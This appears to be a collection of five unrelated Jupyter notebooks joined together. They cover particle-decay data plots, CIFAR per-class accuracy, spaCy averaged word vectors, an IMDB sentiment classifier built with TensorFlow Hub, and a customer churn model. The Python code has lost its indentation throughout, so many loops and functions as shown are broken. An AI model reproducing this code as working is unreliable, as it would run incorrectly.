# Andrzej: Concerning the asymmetric cluster decay, I think it is because the clusters can decay to rho + pi or eta + pi. We could filter them out and check.
# +
import os
import matplotlib.pyplot as plt
import numpy as np
import tensorflow as tf
import sonnet as snt
from gan4hep.utils_plot import add_mean_std, array2hist, view_particle_4vec
from graph_nets import graphs
from gan4hep import rnn_rnn_gan as toGan
from gan4hep.graph import loop_dataset
from gan4hep.graph import read_dataset
# -
evts_per_record = 1000
batch_size = 1000
test_data_name = '/global/homes/x/xju/work/Herwig/Clusters1GeV/inputs/val/all_*.tfrec'
dataset, n_graphs = read_dataset(test_data_name, evts_per_record)
n_batches = n_graphs//batch_size
print("total {} graphs iterated with batch size of {} and {} batches".format(n_graphs, batch_size, n_batches))
test_data = loop_dataset(dataset, batch_size)
truth_4vec = []
input_4vec = []
for inputs, targets in test_data:
input_4vec.append(inputs.nodes)
truth_4vec.append(tf.reshape(targets.nodes, [batch_size, -1, 4]).numpy())
len(truth_4vec), targets.nodes.shape, inputs.nodes.shape
truth_4vec = np.concatenate(truth_4vec, axis=0)
input_4vec = np.concatenate(input_4vec)
def get_pt_eta_phi(px, py, pz):
p = np.sqrt(px**2 + py**2 + pz**2)
pt = np.sqrt(px**2 + py**2)
phi = np.arctan2(py, px)
theta = np.arccos(pz/p)
eta = -np.log(np.tan(0.5*theta))
return pt,eta,phi
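A quick standalone sanity check of the kinematics in `get_pt_eta_phi` (a sketch using `math` rather than numpy; the pseudorapidity is written in the equivalent form $\eta = \frac{1}{2}\ln\frac{p+p_z}{p-p_z} = -\ln\tan(\theta/2)$):

```python
import math

def pt_eta_phi(px, py, pz):
    p = math.sqrt(px * px + py * py + pz * pz)
    pt = math.hypot(px, py)                     # transverse momentum
    phi = math.atan2(py, px)                    # azimuthal angle
    eta = 0.5 * math.log((p + pz) / (p - pz))   # pseudorapidity
    return pt, eta, phi

# a particle in the transverse plane has eta = 0 and phi = pi/2
print(pt_eta_phi(0.0, 3.0, 0.0))
```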
def view_particle(particles):
pt, eta, phi = get_pt_eta_phi(particles[:, 1], particles[:, 2], particles[:, 3])
fig, axs = plt.subplots(2,2, figsize=(8,8))
axs = axs.flatten()
axs[0].hist(pt)
axs[0].set_xlabel("pT [GeV]")
axs[1].hist(eta)
axs[1].set_xlabel("$\eta$")
axs[2].hist(phi)
axs[2].set_xlabel("$\phi$")
axs[3].hist(particles[:, 0])
axs[3].set_xlabel("E [GeV]")
print("Max pT: {:.2f} GeV".format(np.max(pt)))
print("Max eta: {:.2f}".format(np.max(np.abs(eta))))
print("Max E: {:.2f} GeV".format(np.max(particles[:, 0])))
#mask = (np.abs(input_4vec[:, 0] - 1.0) < 1e-5) & (np.abs(input_4vec[:, 3]) < 1e-5)
mask = ...  # Ellipsis keeps every event; swap in the boolean mask above to filter
help(view_particle_4vec)
view_particle_4vec(input_4vec[mask])
view_particle_4vec(truth_4vec[mask, 1])
view_particle_4vec(truth_4vec[mask, 2])
plt.subplots(figsize=(6,6))
plt.hist(truth_4vec[mask, 1, 0]/truth_4vec[mask, 0, 0], bins=50)
plt.xlabel("$E_1$/$E$")
plt.show()
# # Another approach
#
# Incoming particle [P, E] decays to two products ($1\to2$ process).
# Product one:
# * $e_1 = E * z$
# * $p_{x}^{1} = px$
truth_4vec[0]
# [E, px, py, pz] --> MLP --> [px, py, pz, z]
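Under the splitting parametrization above, product one carries the energy fraction $e_1 = E \cdot z$, and the second product follows from energy and momentum conservation. A minimal illustrative sketch (all numbers hypothetical):

```python
def split_decay(parent, z, p1):
    """1->2 decay: product 1 carries energy fraction z and momentum p1;
    product 2 takes the remainder by energy-momentum conservation."""
    E, px, py, pz = parent
    e1 = E * z
    prod1 = (e1, p1[0], p1[1], p1[2])
    prod2 = (E - e1, px - p1[0], py - p1[1], pz - p1[2])
    return prod1, prod2

print(split_decay((10.0, 0.0, 0.0, 5.0), 0.5, (1.0, 0.0, 2.0)))
# ((5.0, 1.0, 0.0, 2.0), (5.0, -1.0, 0.0, 3.0))
```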
|
notebooks/Read-Herwig-1GeV.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
import pathlib
import json
import numpy as np
# load labels of the test set
candidate_file = 'candidate.npz'
test_labels = np.load(candidate_file)['y_test']
# +
# load the indices of the correctly classified test images across different runs
correct_dirs = pathlib.Path.cwd() / 'results' / 'resnet'
cndt_corr_list, cifar_corr_list = list(), list()
for json_file in correct_dirs.glob('*.json'):
with open(json_file) as fn:
json_dict = json.load(fn)
cifar_corr_list.append(json_dict) if 'cifar' in str(json_file) else cndt_corr_list.append(json_dict)
# +
image_per_cls = 200
num_cls = 10
cndt_corr_dict, cifar_corr_dict = dict(), dict()
for i in range(num_cls):
cndt_corr_dict[i] = [len([idx for idx in crlist['correct'] if test_labels[int(idx)] == i])
for crlist in cndt_corr_list]
cifar_corr_dict[i] = [len([idx for idx in crlist['correct'] if test_labels[int(idx)] == i])
for crlist in cifar_corr_list]
# -
cndt_corr_dict
cifar_corr_dict
# +
cifar10_classes = ['airplane', 'automobile', 'bird', 'cat', 'deer', 'dog', 'frog', 'horse', 'ship', 'truck']
str_classes = ''
for lbl in cifar10_classes:
str_classes += lbl + ' '
str_classes = str_classes[:-1]
csv_file = 'cifar_accuracy_per_class.csv'
csv_iter = cifar_corr_dict.values() if csv_file[:5] == 'cifar' else cndt_corr_dict.values()
# per-class accuracy = correct counts / images per class
mean_list = [np.mean(np.array(corr) / image_per_cls) for corr in csv_iter]
std_list = [np.std(np.array(corr) / image_per_cls, ddof=0) for corr in csv_iter]
np.savetxt(csv_file,
np.column_stack((mean_list, std_list)),
fmt='%.4f',
header='class mean std',
comments='',
# delimiter=',',
newline='\n')
with open(csv_file, 'r') as fn:
csv_lines = fn.readlines()
with open(csv_file, 'w') as fn:
for i, ln in enumerate(csv_lines):
if i == 0:
fn.write(ln)
elif i < 11:
fn.write(cifar10_classes[i-1] + ' ' + ln)
else:
print(ln)
# -
|
error_analysis.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# + [markdown] colab_type="text" id="R7Xgt_KQ51l7"
# ## Document Vectors
# Doc2vec allows us to directly learn representations for texts of arbitrary length (phrases, sentences, paragraphs and documents) by taking the context of the words in the text into account.<br><br>
# In this notebook we will create document vectors by averaging word vectors using spaCy. [spaCy](https://spacy.io/) is a Python library for Natural Language Processing (NLP) with many built-in capabilities and features. spaCy offers several types of models; the default model for English is '**en_core_web_sm**'.
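As a minimal illustration of the averaging idea (using made-up toy vectors, not spaCy's), a document vector is just the element-wise mean of the document's word vectors:

```python
def average_vector(vectors):
    """Element-wise mean of equal-length vectors -- the idea behind spaCy's doc.vector."""
    return [sum(vals) / len(vectors) for vals in zip(*vectors)]

# Toy 3-dimensional word vectors (illustrative only; real spaCy vectors are much larger)
word_vectors = {
    "dog":   [0.5, 0.1, -0.3],
    "bites": [0.2, -0.4, 0.6],
    "man":   [-0.1, 0.3, 0.2],
}

doc_vec = average_vector([word_vectors[t] for t in ["dog", "bites", "man"]])
print(doc_vec)  # element-wise mean of the three word vectors
```

spaCy does the same averaging over its trained vectors when you read `doc_nlp.vector` below.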
# +
# To install only the requirements of this notebook, uncomment the lines below and run this cell
# ===========================
# !pip install spacy==2.2.4
# ===========================
# +
# To install the requirements for the entire chapter, uncomment the lines below and run this cell
# ===========================
# try :
# import google.colab
# # !curl https://raw.githubusercontent.com/practical-nlp/practical-nlp/master/Ch3/ch3-requirements.txt | xargs -n 1 -L 1 pip install
# except ModuleNotFoundError :
# # !pip install -r "ch3-requirements.txt"
# ===========================
# -
# downloading en_core_web_sm, assuming spacy is already installed
# !python -m spacy download en_core_web_sm
# + colab={} colab_type="code" id="E7n8Mk0dV8eE"
#Import spacy and load the model
import spacy
nlp = spacy.load("en_core_web_sm") #here nlp object refers to the 'en_core_web_sm' language model instance.
# + colab={"base_uri": "https://localhost:8080/", "height": 1000} colab_type="code" id="mzTU0cJlWF8o" outputId="4aeeae5f-c091-478e-f728-ba54003ae8d6"
#Assume each sentence in documents corresponds to a separate document.
documents = ["Dog bites man.", "Man bites dog.", "Dog eats meat.", "Man eats food."]
processed_docs = [doc.lower().replace(".", "") for doc in documents]
print("Documents after pre-processing:", processed_docs)
#Iterate over each document and initiate an nlp instance.
for doc in processed_docs:
doc_nlp = nlp(doc) #creating a spacy "Doc" object which is a container for accessing linguistic annotations.
print("-"*30)
print("Average Vector of '{}'\n".format(doc),doc_nlp.vector)#this gives the average vector of each document
for token in doc_nlp:
print()
print(token.text,token.vector)#this gives the text of each word in the doc and their respective vectors.
|
Ch3/07_DocVectors_using_averaging_Via_spacy.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# name: python3
# ---
# + [markdown] colab_type="text" id="Ic4_occAAiAT"
# ##### Copyright 2019 The TensorFlow Authors.
# + cellView="form" colab={} colab_type="code" id="ioaprt5q5US7"
#@title Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# + cellView="form" colab={} colab_type="code" id="yCl0eTNH5RS3"
#@title MIT License
#
# Copyright (c) 2017 <NAME>
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
# + [markdown] colab_type="text" id="ItXfxkxvosLH"
# # Text classification with TensorFlow Hub: Movie reviews
# + [markdown] colab_type="text" id="hKY4XMc9o8iB"
# <table class="tfo-notebook-buttons" align="left">
# <td>
# <a target="_blank" href="https://www.tensorflow.org/tutorials/keras/text_classification_with_hub"><img src="https://www.tensorflow.org/images/tf_logo_32px.png" />View on TensorFlow.org</a>
# </td>
# <td>
# <a target="_blank" href="https://colab.research.google.com/github/tensorflow/docs/blob/master/site/en/tutorials/keras/text_classification_with_hub.ipynb"><img src="https://www.tensorflow.org/images/colab_logo_32px.png" />Run in Google Colab</a>
# </td>
# <td>
# <a target="_blank" href="https://github.com/tensorflow/docs/blob/master/site/en/tutorials/keras/text_classification_with_hub.ipynb"><img src="https://www.tensorflow.org/images/GitHub-Mark-32px.png" />View source on GitHub</a>
# </td>
# <td>
# <a href="https://storage.googleapis.com/tensorflow_docs/docs/site/en/tutorials/keras/text_classification_with_hub.ipynb"><img src="https://www.tensorflow.org/images/download_logo_32px.png" />Download notebook</a>
# </td>
# </table>
# + [markdown] colab_type="text" id="Eg62Pmz3o83v"
# This notebook classifies movie reviews as *positive* or *negative* using the text of the review. This is an example of *binary*—or two-class—classification, an important and widely applicable kind of machine learning problem.
#
# The tutorial demonstrates the basic application of transfer learning with TensorFlow Hub and Keras.
#
# We'll use the [IMDB dataset](https://www.tensorflow.org/api_docs/python/tf/keras/datasets/imdb) that contains the text of 50,000 movie reviews from the [Internet Movie Database](https://www.imdb.com/). These are split into 25,000 reviews for training and 25,000 reviews for testing. The training and testing sets are *balanced*, meaning they contain an equal number of positive and negative reviews.
#
# This notebook uses [tf.keras](https://www.tensorflow.org/guide/keras), a high-level API to build and train models in TensorFlow, and [TensorFlow Hub](https://www.tensorflow.org/hub), a library and platform for transfer learning. For a more advanced text classification tutorial using `tf.keras`, see the [MLCC Text Classification Guide](https://developers.google.com/machine-learning/guides/text-classification/).
# + colab={} colab_type="code" id="2ew7HTbPpCJH"
import numpy as np
import tensorflow as tf
# !pip install tensorflow-hub
# !pip install tfds-nightly
import tensorflow_hub as hub
import tensorflow_datasets as tfds
print("Version: ", tf.__version__)
print("Eager mode: ", tf.executing_eagerly())
print("Hub version: ", hub.__version__)
print("GPU is", "available" if tf.config.experimental.list_physical_devices("GPU") else "NOT AVAILABLE")
# + [markdown] colab_type="text" id="iAsKG535pHep"
# ## Download the IMDB dataset
#
# The IMDB dataset is available on [imdb reviews](https://www.tensorflow.org/datasets/catalog/imdb_reviews) or on [TensorFlow datasets](https://www.tensorflow.org/datasets). The following code downloads the IMDB dataset to your machine (or the colab runtime):
# + colab={} colab_type="code" id="zXXx5Oc3pOmN"
# Split the training set into 60% and 40%, so we'll end up with 15,000 examples
# for training, 10,000 examples for validation and 25,000 examples for testing.
train_data, validation_data, test_data = tfds.load(
name="imdb_reviews",
split=('train[:60%]', 'train[60%:]', 'test'),
as_supervised=True)
# + [markdown] colab_type="text" id="l50X3GfjpU4r"
# ## Explore the data
#
# Let's take a moment to understand the format of the data. Each example is a sentence representing the movie review and a corresponding label. The sentence is not preprocessed in any way. The label is an integer value of either 0 or 1, where 0 is a negative review, and 1 is a positive review.
#
# Let's print the first 10 examples.
# + colab={} colab_type="code" id="QtTS4kpEpjbi"
train_examples_batch, train_labels_batch = next(iter(train_data.batch(10)))
train_examples_batch
# + [markdown] colab_type="text" id="IFtaCHTdc-GY"
# Let's also print the first 10 labels.
# + colab={} colab_type="code" id="tvAjVXOWc6Mj"
train_labels_batch
# + [markdown] colab_type="text" id="LLC02j2g-llC"
# ## Build the model
#
# The neural network is created by stacking layers—this requires three main architectural decisions:
#
# * How to represent the text?
# * How many layers to use in the model?
# * How many *hidden units* to use for each layer?
#
# In this example, the input data consists of sentences. The labels to predict are either 0 or 1.
#
# One way to represent the text is to convert sentences into embeddings vectors. We can use a pre-trained text embedding as the first layer, which will have three advantages:
#
# * we don't have to worry about text preprocessing,
# * we can benefit from transfer learning,
# * the embedding has a fixed size, so it's simpler to process.
#
# For this example we will use a **pre-trained text embedding model** from [TensorFlow Hub](https://www.tensorflow.org/hub) called [google/tf2-preview/gnews-swivel-20dim/1](https://tfhub.dev/google/tf2-preview/gnews-swivel-20dim/1).
#
# There are three other pre-trained models to test for the sake of this tutorial:
#
# * [google/tf2-preview/gnews-swivel-20dim-with-oov/1](https://tfhub.dev/google/tf2-preview/gnews-swivel-20dim-with-oov/1) - same as [google/tf2-preview/gnews-swivel-20dim/1](https://tfhub.dev/google/tf2-preview/gnews-swivel-20dim/1), but with 2.5% vocabulary converted to OOV buckets. This can help if vocabulary of the task and vocabulary of the model don't fully overlap.
# * [google/tf2-preview/nnlm-en-dim50/1](https://tfhub.dev/google/tf2-preview/nnlm-en-dim50/1) - A much larger model with ~1M vocabulary size and 50 dimensions.
# * [google/tf2-preview/nnlm-en-dim128/1](https://tfhub.dev/google/tf2-preview/nnlm-en-dim128/1) - Even larger model with ~1M vocabulary size and 128 dimensions.
# + [markdown] colab_type="text" id="In2nDpTLkgKa"
# Let's first create a Keras layer that uses a TensorFlow Hub model to embed the sentences, and try it out on a couple of input examples. Note that no matter the length of the input text, the output shape of the embeddings is: `(num_examples, embedding_dimension)`.
# + colab={} colab_type="code" id="_NUbzVeYkgcO"
embedding = "https://tfhub.dev/google/tf2-preview/gnews-swivel-20dim/1"
hub_layer = hub.KerasLayer(embedding, input_shape=[],
dtype=tf.string, trainable=True)
hub_layer(train_examples_batch[:3])
# + [markdown] colab_type="text" id="dfSbV6igl1EH"
# Let's now build the full model:
# + colab={} colab_type="code" id="xpKOoWgu-llD"
model = tf.keras.Sequential()
model.add(hub_layer)
model.add(tf.keras.layers.Dense(16, activation='relu'))
model.add(tf.keras.layers.Dense(1))
model.summary()
# + [markdown] colab_type="text" id="6PbKQ6mucuKL"
# The layers are stacked sequentially to build the classifier:
#
# 1. The first layer is a TensorFlow Hub layer. This layer uses a pre-trained Saved Model to map a sentence into its embedding vector. The pre-trained text embedding model that we are using ([google/tf2-preview/gnews-swivel-20dim/1](https://tfhub.dev/google/tf2-preview/gnews-swivel-20dim/1)) splits the sentence into tokens, embeds each token and then combines the embedding. The resulting dimensions are: `(num_examples, embedding_dimension)`.
# 2. This fixed-length output vector is piped through a fully-connected (`Dense`) layer with 16 hidden units.
# 3. The last layer is densely connected with a single output node.
#
# Let's compile the model.
# + [markdown] colab_type="text" id="L4EqVWg4-llM"
# ### Loss function and optimizer
#
# A model needs a loss function and an optimizer for training. Since this is a binary classification problem and the model outputs logits (a single-unit layer with a linear activation), we'll use the `binary_crossentropy` loss function.
#
# This isn't the only choice for a loss function; you could, for instance, choose `mean_squared_error`. But, generally, `binary_crossentropy` is better suited to probabilities: it measures the "distance" between probability distributions, or in our case, between the ground-truth distribution and the predictions.
#
# Later, when we are exploring regression problems (say, to predict the price of a house), we will see how to use another loss function called mean squared error.
#
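As an aside, the quantity that `BinaryCrossentropy(from_logits=True)` computes can be sketched by hand (a simplified illustration, not TensorFlow's numerically stable implementation):

```python
import math

def sigmoid(z):
    return 1.0 / (1.0 + math.exp(-z))

def binary_cross_entropy_from_logits(logits, labels):
    """Mean of -(y*log(p) + (1-y)*log(1-p)), where p = sigmoid(logit)."""
    losses = [-(y * math.log(sigmoid(z)) + (1 - y) * math.log(1.0 - sigmoid(z)))
              for z, y in zip(logits, labels)]
    return sum(losses) / len(losses)

# A confident correct prediction gives a small loss; a confident wrong one a large loss.
print(binary_cross_entropy_from_logits([4.0], [1]))  # ~0.018
print(binary_cross_entropy_from_logits([4.0], [0]))  # ~4.018
```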
# Now, configure the model to use an optimizer and a loss function:
# + colab={} colab_type="code" id="Mr0GP-cQ-llN"
model.compile(optimizer='adam',
loss=tf.keras.losses.BinaryCrossentropy(from_logits=True),
metrics=['accuracy'])
# + [markdown] colab_type="text" id="35jv_fzP-llU"
# ## Train the model
#
# Train the model for 20 epochs in mini-batches of 512 samples. This is 20 iterations over all samples in the `x_train` and `y_train` tensors. While training, monitor the model's loss and accuracy on the 10,000 samples from the validation set:
# + colab={} colab_type="code" id="tXSGrjWZ-llW"
history = model.fit(train_data.shuffle(10000).batch(512),
epochs=20,
validation_data=validation_data.batch(512),
verbose=1)
# + [markdown] colab_type="text" id="9EEGuDVuzb5r"
# ## Evaluate the model
#
# And let's see how the model performs. Two values will be returned. Loss (a number which represents our error, lower values are better), and accuracy.
# + colab={} colab_type="code" id="zOMKywn4zReN"
results = model.evaluate(test_data.batch(512), verbose=2)
for name, value in zip(model.metrics_names, results):
print("%s: %.3f" % (name, value))
# + [markdown] colab_type="text" id="z1iEXVTR0Z2t"
# This fairly naive approach achieves an accuracy of about 87%. With more advanced approaches, the model should get closer to 95%.
# + [markdown] colab_type="text" id="5KggXVeL-llZ"
# ## Further reading
#
# For a more general way to work with string inputs and for a more detailed analysis of the progress of accuracy and loss during training, take a look [here](https://www.tensorflow.org/tutorials/keras/basic_text_classification).
|
site/en/tutorials/keras/text_classification_with_hub.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3.6
# language: python
# name: python3
# ---
# # Trading Platform Customer Attrition Risk Prediction using sklearn
#
# There are many users of online trading platforms and these companies would like to run analytics on and predict churn based on user activity on the platform. Since competition is rife, keeping customers happy so they do not move their investments elsewhere is key to maintaining profitability.
#
# In this notebook, we will leverage Watson Studio Local (a service on IBM Cloud Pak for Data) to do the following:
#
# 1. Ingest merged customer demographics and trading activity data
# 2. Visualize merged dataset and get better understanding of data to build hypotheses for prediction
# 3. Leverage sklearn library to build classification model that predicts whether customer has propensity to churn
# 4. Expose the classification model as a RESTful API endpoint for the end-to-end customer churn risk prediction and risk remediation application
#
# <img src="https://github.com/burtvialpando/CloudPakWorkshop/blob/master/CPD/images/NotebookImage.png?raw=true" width="800" height="500" align="middle"/>
#
#
# <a id="top"></a>
# ## Table of Contents
#
# 1. [Load libraries](#load_libraries)
# 2. [Load and visualize merged customer demographics and trading activity data](#load_data)
# 3. [Prepare data for building classification model](#prepare_data)
# 4. [Train classification model and test model performance](#build_model)
# 5. [Save model to ML repository and expose it as REST API endpoint](#save_model)
# 6. [Summary](#summary)
# ### Quick set of instructions to work through the notebook
#
# If you are new to Notebooks, here's a quick overview of how to work in this environment.
#
# 1. The notebook has 2 types of cells - markdown (text) such as this and code such as the one below.
# 2. Each cell with code can be executed independently or together (see options under the Cell menu). When working in this notebook, we will be running one cell at a time because we need to make code changes to some of the cells.
# 3. To run the cell, position cursor in the code cell and click the Run (arrow) icon. The cell is running when you see the * next to it. Some cells have printable output.
# 4. Work through this notebook by reading the instructions and executing code cell by cell. Some cells will require modifications before you run them.
# <a id="load_libraries"></a>
# ## 1. Load libraries
# [Top](#top)
#
# Running the following cell will load all libraries needed to load, visualize, prepare the data and build ML models for our use case
#Uncomment and run once to install the package in your runtime environment
# #!pip uninstall -y sklearn-pandas
# !pip install --no-cache-dir sklearn-pandas==1.7.0
# If the following cell doesn't work, please uncomment the next line and upgrade the matplotlib package. When the upgrade is done, restart the kernel and start from the beginning.
# !pip install --user --upgrade matplotlib
import brunel
import pandas as pd
import numpy as np
import sklearn.pipeline
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import MinMaxScaler, LabelEncoder, StandardScaler, LabelBinarizer, OneHotEncoder
from sklearn.ensemble import RandomForestClassifier
from sklearn.metrics import f1_score, accuracy_score, roc_curve, roc_auc_score
from sklearn_pandas import DataFrameMapper
from sklearn.model_selection import GridSearchCV
from sklearn.metrics import make_scorer
import json
import matplotlib.pyplot as plt
# %matplotlib inline
# +
#Changed sk-learn version to be compatible with WML client4 on CPD v3.0.1
# #!pip uninstall -y scikit-learn
# #!pip install --no-cache-dir scikit-learn==0.22
# -
# <a id="load_data"></a>
# ## 2. Load and visualize merged customer demographics and trading activity data
# [Top](#top)
#
# Data can be easily loaded within ICPD using point-and-click functionality. The following image illustrates how to load a merged dataset assuming it is called "customer_demochurn_activity_analyze.csv". The file can be located by its name and inserted into the notebook as a **pandas** dataframe as shown below:
#
# <img src="https://github.com/burtvialpando/CloudPakWorkshop/blob/master/CPD/images/InsertPandasDataFrame.png?raw=true" width="300" height="300" align="middle"/>
#
# The interface comes up with a generic name, so it is good practice to rename the dataframe to match the context of the use case. In this case, we will use df_churn_pd.
# +
# Use the `Find and add data` menu item in the top right corner to insert code for a pandas Dataframe
# <INSERT CODE HERE>
# comment out or rename the default df_data_1 dataframe name with the df_churn_pd name used in this notebook
df_churn_pd = pd.read_csv(body)
df_churn_pd.head()
# -
# Data visualization is a key step in the data mining process that helps us better understand the data before it is prepared for building ML models.
#
# We use the Brunel library, which comes preloaded in the Watson Studio Local environment, to visualize the merged customer data.
#
# The Brunel Visualization Language is a highly succinct and novel language that defines interactive data visualizations based on tabular data. The language is well suited for both data scientists and business users. More information about Brunel Visualization: https://github.com/Brunel-Visualization/Brunel/wiki
#
# Try Brunel visualization here: http://brunel.mybluemix.net/gallery_app/renderer
df_churn_pd.dtypes
df_churn_pd.describe()
# %brunel data('df_churn_pd') stack polar bar x(CHURNRISK) y(#count) color(CHURNRISK) bar tooltip(#all)
# %brunel data('df_churn_pd') bar x(STATUS) y(#count) color(STATUS) tooltip(#all) | stack bar x(STATUS) y(#count) color(CHURNRISK: pink-orange-yellow) bin(STATUS) sort(STATUS) percent(#count) label(#count) tooltip(#all) :: width=1200, height=350
# %brunel data('df_churn_pd') bar x(TOTALUNITSTRADED) y(#count) color(CHURNRISK: pink-gray-orange) sort(STATUS) percent(#count) label(#count) tooltip(#all) :: width=1200, height=350
# %brunel data('df_churn_pd') bar x(DAYSSINCELASTTRADE) y(#count) color(CHURNRISK: pink-gray-orange) sort(STATUS) percent(#count) label(#count) tooltip(#all) :: width=1200, height=350
# <a id="prepare_data"></a>
# ## 3. Data preparation
# [Top](#top)
#
# Data preparation is a very important step in machine learning model building. A model can perform well only when the data it is trained on is well prepared, which is why this step consumes the bulk of a data scientist's model-building time.
#
# During this process, we identify the categorical columns in the dataset. Categories need to be indexed, which means the string labels are converted to label indices. These label indices are then encoded, using one-hot encoding, into a binary vector with at most a single one-value indicating the presence of a specific feature value from among the set of all feature values. This encoding allows algorithms that expect continuous features to use categorical features.
#
# The final step in the data preparation process is to assemble all the categorical and non-categorical columns into a single feature matrix. We use the DataFrameMapper from the sklearn-pandas package for this: it applies the declared transformation to each column and concatenates the results into a single array suitable for training ML models.
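To make the one-hot idea concrete, here is a pure-Python sketch with a made-up toy column (the LabelBinarizer used below does the equivalent, plus inverse transforms and other conveniences):

```python
def one_hot(values):
    """Encode each value as a binary vector with one column per sorted unique value."""
    classes = sorted(set(values))
    encoded = [[1 if v == c else 0 for c in classes] for v in values]
    return classes, encoded

# Toy marital-status column (illustrative values only, not from the churn dataset)
classes, encoded = one_hot(['S', 'M', 'D', 'M', 'S'])
print(classes)     # ['D', 'M', 'S']
print(encoded[0])  # [0, 0, 1] -- 'S' maps to the third column
```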
# #### Use the DataFrameMapper class to declare transformations and variable imputations.
#
# * LabelBinarizer - Converts a categorical variable into a dummy variable (aka binary variable)
# * StandardScaler - Standardize features by removing the mean and scaling to unit variance, z = (x - u) / s
#
# See docs:
# * https://github.com/scikit-learn-contrib/sklearn-pandas
# * https://scikit-learn.org/stable/modules/generated/sklearn.preprocessing.StandardScaler.html#sklearn.preprocessing.StandardScaler
# * https://scikit-learn.org/stable/modules/generated/sklearn.preprocessing.LabelBinarizer.html#sklearn.preprocessing.LabelBinarizer
# * https://scikit-learn.org/stable/modules/generated/sklearn.pipeline.Pipeline.html
# Defining the categorical columns
categoricalColumns = ['GENDER', 'STATUS', 'HOMEOWNER', 'AGE_GROUP']
numericColumns = ['CHILDREN', 'ESTINCOME', 'TOTALDOLLARVALUETRADED', 'TOTALUNITSTRADED', 'LARGESTSINGLETRANSACTION', 'SMALLESTSINGLETRANSACTION',
'PERCENTCHANGECALCULATION', 'DAYSSINCELASTLOGIN', 'DAYSSINCELASTTRADE', 'NETREALIZEDGAINS_YTD', 'NETREALIZEDLOSSES_YTD']
mapper = DataFrameMapper([
(['GENDER'], LabelBinarizer()),
(['STATUS'], LabelBinarizer()),
(['HOMEOWNER'], LabelBinarizer()),
(['AGE_GROUP'], LabelBinarizer()),
(['CHILDREN'], StandardScaler()),
(['ESTINCOME'], StandardScaler()),
(['TOTALDOLLARVALUETRADED'], StandardScaler()),
(['TOTALUNITSTRADED'], StandardScaler()),
(['LARGESTSINGLETRANSACTION'], StandardScaler()),
(['SMALLESTSINGLETRANSACTION'], StandardScaler()),
(['PERCENTCHANGECALCULATION'], StandardScaler()),
(['DAYSSINCELASTLOGIN'], StandardScaler()),
(['DAYSSINCELASTTRADE'], StandardScaler()),
(['NETREALIZEDGAINS_YTD'], StandardScaler()),
(['NETREALIZEDLOSSES_YTD'], StandardScaler())], default=False)
df_churn_pd.columns
# Define input data to the model
X = df_churn_pd.drop(['ID','CHURNRISK','AGE','TAXID','CREDITCARD','DOB','ADDRESS_1', 'ADDRESS_2', 'CITY', 'STATE', 'ZIP', 'ZIP4', 'LONGITUDE',
'LATITUDE'], axis=1)
X.shape
# Define the target variable and encode with value between 0 and n_classes-1
le = LabelEncoder()
y = le.fit_transform(df_churn_pd['CHURNRISK'])
# split the data to training and testing set
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, random_state=5)
# <a id="build_model"></a>
# ## 4. Build Random Forest classification model
# [Top](#top)
# We instantiate a decision-tree based classification algorithm, namely RandomForestClassifier. Next we define a pipeline to chain together the various transformers and estimators defined during the data preparation step. Sklearn standardizes APIs for machine learning algorithms, making it easier to combine multiple algorithms into a single pipeline, or workflow.
#
# We split original dataset into train and test datasets. We fit the pipeline to training data and apply the trained model to transform test data and generate churn risk class prediction
import warnings
warnings.filterwarnings("ignore")
# +
# Instantiate the Classifier
random_forest = RandomForestClassifier(random_state=5)
# Define the steps in the pipeline to sequentially apply a list of transforms and the estimator, i.e. RandomForestClassifier
steps = [('mapper', mapper),('RandonForestClassifier', random_forest)]
pipeline = sklearn.pipeline.Pipeline(steps)
# train the model
model=pipeline.fit( X_train, y_train )
model
# -
### call pipeline.predict() on your X_test data to make a set of test predictions
y_prediction = model.predict( X_test )
# show first 10 rows of predictions
y_prediction[0:10,]
# show first 10 rows of predictions with the corresponding labels
le.inverse_transform(y_prediction)[0:10]
# ### Model results
#
# In a supervised classification problem such as churn risk classification, we have a true output and a model-generated predicted output for each data point. For this reason, the results for each data point can be assigned to one of four categories:
#
# 1. True Positive (TP) - label is positive and prediction is also positive
# 2. True Negative (TN) - label is negative and prediction is also negative
# 3. False Positive (FP) - label is negative but prediction is positive
# 4. False Negative (FN) - label is positive but prediction is negative
#
